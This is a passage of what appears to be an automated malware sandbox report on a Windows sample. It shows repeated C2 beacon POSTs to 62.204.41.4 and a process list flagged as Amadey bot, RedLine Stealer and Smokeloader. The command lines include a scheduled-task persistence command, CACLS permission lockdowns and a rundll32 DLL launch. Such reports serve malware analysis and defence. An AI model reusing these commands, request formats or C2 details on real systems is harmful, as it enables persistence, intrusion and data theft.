                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:53.126007080 CET114INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          90192.168.2.64981062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:15.107347012 CET210OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:15.174127102 CET210INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          91192.168.2.64981162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:15.342261076 CET211OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:15.405101061 CET211INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          92192.168.2.64981262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:15.578134060 CET212OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:15.639976978 CET213INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          93192.168.2.64981462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:15.831909895 CET220OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:15.893851995 CET220INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          94192.168.2.64981562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:16.077954054 CET221OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:16.143034935 CET221INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          95192.168.2.64981662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:16.328216076 CET222OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:16.390471935 CET222INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          96192.168.2.64981762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:16.563417912 CET223OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:16.628117085 CET223INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          97192.168.2.64981862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:16.810089111 CET224OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:16.873842955 CET224INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          98192.168.2.64981962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:17.050745964 CET225OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:17.115938902 CET225INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          99192.168.2.64982062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:17.299894094 CET226OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:17.364586115 CET226INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:20:00:13
                          Start date:07/02/2023
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\file.exe
                          Imagebase:0xeb0000
                          File size:537088 bytes
                          MD5 hash:16755B75334B8655BC2357553A9FDAB4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          Target ID:1
                          Start time:20:00:13
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          Imagebase:0x940000
                          File size:346112 bytes
                          MD5 hash:DAE3685D13248C42313D46F76E2EC968
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 54%, ReversingLabs
                          Reputation:low

                          Target ID:2
                          Start time:20:00:14
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
                          Imagebase:0x400000
                          File size:251392 bytes
                          MD5 hash:6E870598039CCE621C7BB265AC99BB3F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 47%, ReversingLabs
                          Reputation:low

                          Target ID:3
                          Start time:20:00:26
                          Start date:07/02/2023
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Imagebase:0x7ff64d2d0000
                          File size:69632 bytes
                          MD5 hash:73C519F050C20580F8A62C849D49215A
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:6
                          Start time:20:00:32
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          Imagebase:0xad0000
                          File size:11264 bytes
                          MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 82%, ReversingLabs
                          Reputation:moderate

                          Target ID:10
                          Start time:20:00:34
                          Start date:07/02/2023
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Imagebase:0x7ff64d2d0000
                          File size:69632 bytes
                          MD5 hash:73C519F050C20580F8A62C849D49215A
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:11
                          Start time:20:00:44
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          Imagebase:0x1360000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000000.315712522.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 81%, ReversingLabs
                          Reputation:moderate

                          Target ID:12
                          Start time:20:00:45
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                          Imagebase:0x980000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.774886747.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000000.318048617.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 81%, ReversingLabs
                          Reputation:moderate

                          Target ID:13
                          Start time:20:00:46
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Imagebase:0x12e0000
                          File size:185856 bytes
                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:14
                          Start time:20:00:46
                          Start date:07/02/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6da640000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:15
                          Start time:20:00:46
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                          Imagebase:0x1b0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:16
                          Start time:20:00:46
                          Start date:07/02/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6da640000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:17
                          Start time:20:00:50
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Imagebase:0x1b0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:18
                          Start time:20:00:50
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cacls.exe
                          Wow64 process (32bit):true
                          Commandline:CACLS "mnolyk.exe" /P "user:N"
                          Imagebase:0x1120000
                          File size:27648 bytes
                          MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:19
                          Start time:20:00:50
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Imagebase:0x980000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.332316282.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.329538528.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                          Target ID:20
                          Start time:20:00:50
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cacls.exe
                          Wow64 process (32bit):true
                          Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                          Imagebase:0x1120000
                          File size:27648 bytes
                          MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:21
                          Start time:20:00:51
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Imagebase:0x1b0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:22
                          Start time:20:00:51
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                          Imagebase:0x920000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:23
                          Start time:20:00:51
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cacls.exe
                          Wow64 process (32bit):true
                          Commandline:CACLS "..\4b9a106e76" /P "user:N"
                          Imagebase:0x1120000
                          File size:27648 bytes
                          MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:24
                          Start time:20:00:52
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cacls.exe
                          Wow64 process (32bit):true
                          Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                          Imagebase:0x1120000
                          File size:27648 bytes
                          MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:25
                          Start time:20:01:01
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Imagebase:0x7ff603c50000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000002.352687909.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000000.352170413.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                          Target ID:28
                          Start time:20:02:00
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
